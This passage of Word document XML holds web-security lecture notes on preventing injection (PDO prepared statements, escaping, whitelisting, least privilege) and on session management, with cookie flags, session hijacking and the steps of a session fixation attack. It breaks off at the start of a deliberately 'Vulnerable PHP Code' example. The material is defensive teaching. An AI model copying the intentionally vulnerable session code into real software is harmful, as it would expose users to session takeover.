      </w:r>
    </w:p>
    <w:p w14:paraId="675ADE3E" w14:textId="6FEA33E4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Identify places where interpreters process user input</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="240CE81C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Trace data flow from user input to command execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E31501E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4C8537EA" w14:textId="06D5B1F6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Input Validation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="109B5AF6" w14:textId="4F18CEDB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Validate user-controlled data before use in commands/queries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32FD58A6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Check for suspicious patterns (SQL keywords, shell metacharacters)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C3EA482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4A39DEA6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Prevention Strategies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D1996C" w14:textId="05C49302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Parameterized Queries (Prepared Statements):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FAC7C4A" w14:textId="61487955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Use secure APIs that separate data from code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C9AC7DE" w14:textId="0728E1C0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Example in PHP with PDO:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F33D66D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$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00496876">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>stmt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00496876">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> = $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00496876">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>pdo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00496876">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00496876">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>prepare(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00496876">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">'SELECT * FROM users WHERE </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00496876">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>uid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00496876">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00496876">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>= :</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00496876">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>uid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00496876">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00496876">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6E3B123D" w14:textId="32B6081D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$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00496876">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>stmt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00496876">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00496876">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>execute(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00496876">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>['</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00496876">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>uid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00496876">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>' =&gt; $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00496876">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>userId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00496876">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00496876">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2775CAC3" w14:textId="77777777" w:rsidR="00496876" w:rsidRDefault="00496876" w:rsidP="00496876">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A5B06B3" w14:textId="77777777" w:rsidR="00496876" w:rsidRDefault="00496876" w:rsidP="00496876">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3604EC91" w14:textId="503D8479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lastRenderedPageBreak/>
        <w:t>Input Sanitization:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34EA95DB" w14:textId="630FE920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Escape special characters using language-specific functions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B2C8D5" w14:textId="746F624A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 xml:space="preserve">SQL: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00496876">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>mysqli_real_escape_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00496876">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00496876">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00496876">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10CF6E45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 xml:space="preserve">HTML: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00496876">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>htmlspecialchars</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00496876">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00496876">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C60D36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0AE2808A" w14:textId="701A9FC6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Whitelist Validation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF8A6C1" w14:textId="4870688A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Define acceptable input patterns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651FCEF2" w14:textId="1B67487B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Reject anything not matching the pattern</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1052FD46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Example: Only allow alphanumeric characters for usernames</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ACB145C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0D299020" w14:textId="6454620F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Least Privilege Principle:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E128BCC" w14:textId="1442CF50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Database accounts with minimal necessary permissions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF3B213" w14:textId="2889F9B6" w:rsid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Application shouldn't use admin database credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0DE31F" w14:textId="77777777" w:rsidR="00496876" w:rsidRDefault="00496876" w:rsidP="00496876">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A7FE1F5" w14:textId="1FEE7511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5. Broken Authentication and Session Management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="570C4154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Definition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C331EBE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Bugs in authentication and session management allow compromise of passwords, session tokens, or exploitation of implementation flaws to assume other users' identities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202F0FBB" w14:textId="77777777" w:rsidR="00496876" w:rsidRDefault="00496876" w:rsidP="00496876">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17FB60B4" w14:textId="77777777" w:rsidR="00496876" w:rsidRDefault="00496876" w:rsidP="00496876">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6774C5C6" w14:textId="77777777" w:rsidR="00496876" w:rsidRDefault="00496876" w:rsidP="00496876">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37BECF9B" w14:textId="77777777" w:rsidR="00496876" w:rsidRDefault="00496876" w:rsidP="00496876">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6539C073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487B2EF5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lastRenderedPageBreak/>
        <w:t>Session Management Basics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0305009A" w14:textId="7398F8E8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User Flow:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56BE69F8" w14:textId="4E91C328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User authenticates (provides credentials)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB0AC0C" w14:textId="48F8BE81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Server creates session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4955FDE9" w14:textId="09B14710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Server stores user info and session state</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02FAAA44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Server sends session ID to client</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6562A547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7BFE1D4D" w14:textId="70FFEF60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Session ID Requirements:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32616056" w14:textId="258F296B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Unique: Unambiguous, designating single user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5390510E" w14:textId="0034A4F3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Unpredictable: Random, not guessable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62827295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Expiring: Limited lifetime to reduce damage if compromised</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41729891" w14:textId="77777777" w:rsidR="00496876" w:rsidRPr="00496876" w:rsidRDefault="00496876" w:rsidP="00496876">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6453D5BB" w14:textId="77777777" w:rsidR="00496876" w:rsidRPr="00496876" w:rsidRDefault="00496876" w:rsidP="00496876">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00496876">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Session ID Implementation Methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E0CB82" w14:textId="417503C6" w:rsidR="00496876" w:rsidRDefault="00496876" w:rsidP="0049687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96876">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Hidden Form Fields</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F067C83" w14:textId="41F1B383" w:rsid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&lt;input type="hidden" name="user" value="crBT813dpkWEQ62nf"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69417EED" w14:textId="7E5AE9C7" w:rsid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Risk: Visible in page source, vulnerable to CSRF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F4E7429" w14:textId="77777777" w:rsidR="00496876" w:rsidRPr="00496876" w:rsidRDefault="00496876" w:rsidP="00496876">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06096B79" w14:textId="77777777" w:rsidR="00496876" w:rsidRDefault="00496876" w:rsidP="00496876">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D58EEC3" w14:textId="77777777" w:rsidR="00496876" w:rsidRDefault="00496876" w:rsidP="00496876">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66495614" w14:textId="77777777" w:rsidR="00496876" w:rsidRDefault="00496876" w:rsidP="00496876">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CA4843B" w14:textId="77777777" w:rsidR="00496876" w:rsidRDefault="00496876" w:rsidP="00496876">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C42591E" w14:textId="77777777" w:rsidR="00496876" w:rsidRDefault="00496876" w:rsidP="00496876">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A860D09" w14:textId="77777777" w:rsidR="00496876" w:rsidRDefault="00496876" w:rsidP="00496876">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10AF4702" w14:textId="4861C9C3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lastRenderedPageBreak/>
        <w:t>2. Cookies (Most Common)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A98924" w14:textId="7FCB340A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Cookie Components:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ACFEE53" w14:textId="319865A2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Name/Value: Session identifier</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07BFD2F9" w14:textId="3E7FD763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Expiration: When cookie becomes invalid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC6F7BF" w14:textId="4976BB25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Domain/Path: Where cookie is sent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F48F27" w14:textId="33AF1240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Secure Flag: Only sent over HTTPS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58247D85" w14:textId="77777777" w:rsidR="00496876" w:rsidRPr="00496876" w:rsidRDefault="00496876" w:rsidP="00496876">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00496876">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>HttpOnly</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00496876">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Flag: Not accessible via JavaScript (prevents XSS theft)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF0338F" w14:textId="77777777" w:rsidR="00496876" w:rsidRPr="00496876" w:rsidRDefault="00496876" w:rsidP="00496876">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E2C7B39" w14:textId="3BF69911" w:rsid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Example Cookie:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05612536" w14:textId="1A08D455" w:rsid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 xml:space="preserve">Set-Cookie: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00496876">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>sessionid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00496876">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">=crBT813dpkWEQ62nf; Expires=Wed, 15 Jan 2026 12:00:00 GMT; Secure; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00496876">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>HttpOnly</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7C11EF31" w14:textId="77777777" w:rsidR="00496876" w:rsidRDefault="00496876" w:rsidP="00496876">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CCADC2C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Common Vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6D2DDE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1. Session Hijacking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5C4484" w14:textId="5712303F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Attacker discovers valid session ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="412360CD" w14:textId="6FD1CE0E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 xml:space="preserve">Uses it to impersonate legitimate </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00496876">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0545813A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Causes: Predictable session IDs, session ID exposure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="567B3EFF" w14:textId="77777777" w:rsidR="00496876" w:rsidRDefault="00496876" w:rsidP="00496876">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0321D911" w14:textId="77777777" w:rsidR="00496876" w:rsidRDefault="00496876" w:rsidP="00496876">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B902AD5" w14:textId="77777777" w:rsidR="00496876" w:rsidRDefault="00496876" w:rsidP="00496876">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70D97C72" w14:textId="77777777" w:rsidR="00496876" w:rsidRDefault="00496876" w:rsidP="00496876">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B1FA07E" w14:textId="77777777" w:rsidR="00496876" w:rsidRDefault="00496876" w:rsidP="00496876">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A09D0C7" w14:textId="77777777" w:rsidR="00496876" w:rsidRPr="00496876" w:rsidRDefault="00496876" w:rsidP="00496876">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="512CADED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lastRenderedPageBreak/>
        <w:t>2. Session Fixation Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="780C3C70" w14:textId="5EDAE1E0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Attack Process:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2D90DE" w14:textId="0E1832B5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Attacker obtains valid session ID (logs into application)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23783466" w14:textId="515E058C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Induces victim to use same session ID (via link manipulation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00AC253F" w14:textId="559B2FEB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Victim authenticates with fixed session ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="671D81F4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Attacker hijacks authenticated session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="720F63F3" w14:textId="77777777" w:rsidR="00496876" w:rsidRPr="00496876" w:rsidRDefault="00496876" w:rsidP="00496876">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="280A93E3" w14:textId="77777777" w:rsidR="00F70556" w:rsidRDefault="00F70556" w:rsidP="00496876">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57B1A381" w14:textId="77777777" w:rsidR="00F70556" w:rsidRDefault="00F70556" w:rsidP="00496876">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B0C0A16" w14:textId="77777777" w:rsidR="00F70556" w:rsidRDefault="00F70556" w:rsidP="00496876">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BB1644D" w14:textId="77777777" w:rsidR="00F70556" w:rsidRDefault="00F70556" w:rsidP="00496876">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="721D8082" w14:textId="77777777" w:rsidR="00F70556" w:rsidRDefault="00F70556" w:rsidP="00496876">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="280C45C3" w14:textId="77777777" w:rsidR="00F70556" w:rsidRDefault="00F70556" w:rsidP="00496876">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31E87051" w14:textId="77777777" w:rsidR="00F70556" w:rsidRDefault="00F70556" w:rsidP="00496876">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02AF5DF7" w14:textId="77777777" w:rsidR="00F70556" w:rsidRDefault="00F70556" w:rsidP="00496876">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="547079E0" w14:textId="77777777" w:rsidR="00F70556" w:rsidRDefault="00F70556" w:rsidP="00496876">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BDC8B1F" w14:textId="77777777" w:rsidR="00F70556" w:rsidRDefault="00F70556" w:rsidP="00496876">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5820EBB7" w14:textId="77777777" w:rsidR="00F70556" w:rsidRDefault="00F70556" w:rsidP="00496876">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A4D4BBE" w14:textId="77777777" w:rsidR="00F70556" w:rsidRDefault="00F70556" w:rsidP="00496876">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7654E080" w14:textId="77777777" w:rsidR="00F70556" w:rsidRDefault="00F70556" w:rsidP="00496876">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FAD55C1" w14:textId="77777777" w:rsidR="00F70556" w:rsidRDefault="00F70556" w:rsidP="00496876">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4293A100" w14:textId="77777777" w:rsidR="00F70556" w:rsidRDefault="00F70556" w:rsidP="00496876">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3969EC90" w14:textId="77777777" w:rsidR="00F70556" w:rsidRDefault="00F70556" w:rsidP="00496876">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DF71B5F" w14:textId="34945411" w:rsid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lastRenderedPageBreak/>
        <w:t>Vulnerable PHP Code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="195575A0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&lt;?</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00496876">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7E8E485F" w14:textId="77777777" w:rsidR="00496876" w:rsidRPr="00496876" w:rsidRDefault="00496876" w:rsidP="00496876">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00496876">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>session_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00496876">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>start</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00496876">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="337B6F21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 xml:space="preserve">if </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00496876">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(!</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00496876">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>isset</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
